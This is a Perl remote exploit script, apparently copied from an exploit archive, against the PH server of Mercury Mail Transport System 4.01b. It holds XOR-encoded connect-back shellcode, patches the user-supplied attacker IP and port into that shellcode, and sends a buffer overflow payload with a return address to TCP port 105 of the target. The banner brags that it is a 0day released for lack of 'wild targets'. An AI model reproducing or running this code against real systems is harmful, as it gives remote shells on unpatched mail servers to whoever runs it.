Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)
# Published : 2005-12-16
# Author : kcope
# Previous Title : Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)
# Next Title : Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit

### mercurysexywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
###################################################################
use IO::Socket;
# 316 bytes
$cbsc =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0BxC2xE2xFA"
."xEBx05xE8xEBxFFxFFxFF"
."x2Bx39xC2xC2xC2x9DxA6x63xF2xC2xC2xC2x49x82xCEx49"
."xB2xDEx6Fx49xAAxCAx49x35xA8xC6x9Bx2Ax59xC2xC2xC2"
."x20x3BxAAxF1xF0xC2xC2xAAxB5xB1xF0x9Dx96x3DxD4x49"
."x2AxA8xC6x9Bx2Ax40xC2xC2xC2x20x3Bx43x2Ex52xC3xC2"
."xC2x96xAAxC3xC3xC2xC2x3Dx94xD2x92x92x92x92x82x92"
."x82x92x3Dx94xD6x49x1AxAAxBDxC2xC2xC3xAAxC0xC2xC2"
."xF7x49x0ExA8xD2x93x91x3Dx94xDAx47x02xB7x88xAAxA1"
."xAFxA6xC2x4BxA4xF2x41x2Ex96x4FxFExE6xA8xD7x9Bx69"
."x20x3Fx04x86xE6xD2x86x3Cx86xE6xFFx4Bx9ExE6x8Ax4B"
."x9ExE6x8Ex4Bx9ExE6x92x4Fx86xE6xD2x96x92x93x93x93"
."xA8xC3x93x93x3DxB4xF2x93x3Dx94xC6x49x0ExA8x3Dx3D"
."xF3x3Dx94xCAx91x3Dx94xDEx3Dx94xCEx93x94x49x87xFE"
."x49x96xEAxBAxC1x17x90x49xB0xE2xC1x37xF1x0Bx8Bx83"
."x6FxC1x07xF1x19xCDx7CxD2xF8x14xB6xCAx03x09xCFxC1"
."x18x82x29x33xF9xDDxB7x25x98x49x98xE6xC1x1FxA4x49"
."xCEx89x49x98xDExC1x1Fx49xC6x49xC1x07x69x9Cx9Bx01"
."x2AxC2x3Dx3Dx3Dx4Cx8CxCCx2ExB0x3Cx71xD4x6Fx1BxC7"
."x0CxBCx1Ax20xB1x09x2Fx3ExF9x1BxCBx37x6Fx2Ex3Bx68"
."xA2x25xBBx04xBB";

$numtargets = 1;

@targets =
(
 ["Mercury Mail Transport System 4.01b Win2k SP4/WinXP SP2", "x83xf2x41x00"]
);

print "Okayokay THiS iS 0DAY!!!n";
print "Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOITnkcope [kingcope(at)gmx.net] in 2005! JUUAREZ!n";
print "Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!n";
if ($#ARGV ne 3) {
       print "usage: mecurysexywarez.pl target targettype yourip yourportnn";
   for ($i=0; $i<$numtargets; $i++) {
        print " [".$i."]...". $targets[$i][0]. "n";
   }
       exit(0);
}

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '105',
                             Proto    => 'tcp') || die("Oh my godess! Port not open! Pleeze open and try again :PP");
$tt=$ARGV[1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);

($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);

$pad="A" x 408 . $cbsc . "x90x90xebx04";
$pad2="A" x 440;

$ret=$targets[$tt][1];
$x=$pad.$ret."JJJJKKKKLLLLMMMMNNNNOOOOPPPPxe9x87xfexffxff".$pad2;
print $sock "$xrn";

while (<$sock>) {
       print;
}

# www.Syue.com [2005-12-16]